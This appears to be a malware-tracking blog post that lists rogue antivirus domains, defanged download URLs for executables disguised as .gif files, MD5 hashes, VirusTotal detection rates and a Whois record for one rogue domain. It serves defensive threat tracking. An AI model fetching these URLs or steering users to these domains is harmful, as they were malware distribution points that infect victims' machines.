hxxp://exe-file-boom.com/streamviewer.40014.exe

a.exe (served under a .gif file name)
Result: 11/39 (28.21%)
MD5: 2e326fd4048bdf28308a9bb5ced08ed7
VirusTotal
ThreatExpert Analysis
hxxp://thenewpic.com/item/a5acc232141aba8b24603e1b24eb084d0e020a6c16c76e38e6582142a6c4df427ca48b89cc4e0cf0a/4400d031142/titem.gif

b.exe or msa.exe (also served under a .gif file name)
Result: 5/39 (12.83%)
MD5: c665052347ce07a9626c6cdcdb0e56d8
VirusTotal
ThreatExpert Analysis
hxxp://theimagesphoto.com/werber/04d04071f42/217.gif

09 Jun

New rogue domain: ourbestsecurityshield.com

New rogue domain found today.

Whois entry for ourbestsecurityshield.com 209.44.126.241
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

securexdetect.com
securityfastscan.com
securityuniqscan.com
sidewebvirusscan.com
souptotalsecurity.com
thetrueshiledsecurity.com
todaysecuritytop.com
totalvirusshield.com
uniqtrustedweb.com
uniqviruscleaner.com
virusdestroyerboost.com
www.allowedwebsurfing.com
www.bestwebscantools.com
www.fullsecurityaction.com
www.fullvirusprotection.com
www.hupersecuritydot.com
www.intellectsecurityshield.com
www.truevirusshield.com
www.uniqviruscleaner.com
xvirusdescan.com

install.exe (System Security 2009)
Result: 12/40 (30%)
MD5: bfb22174402c3123915a8bb7b019aba1
VirusTotal
ThreatExpert Analysis
hxxp://ourbestsecurityshield.com/download.php?affid=08045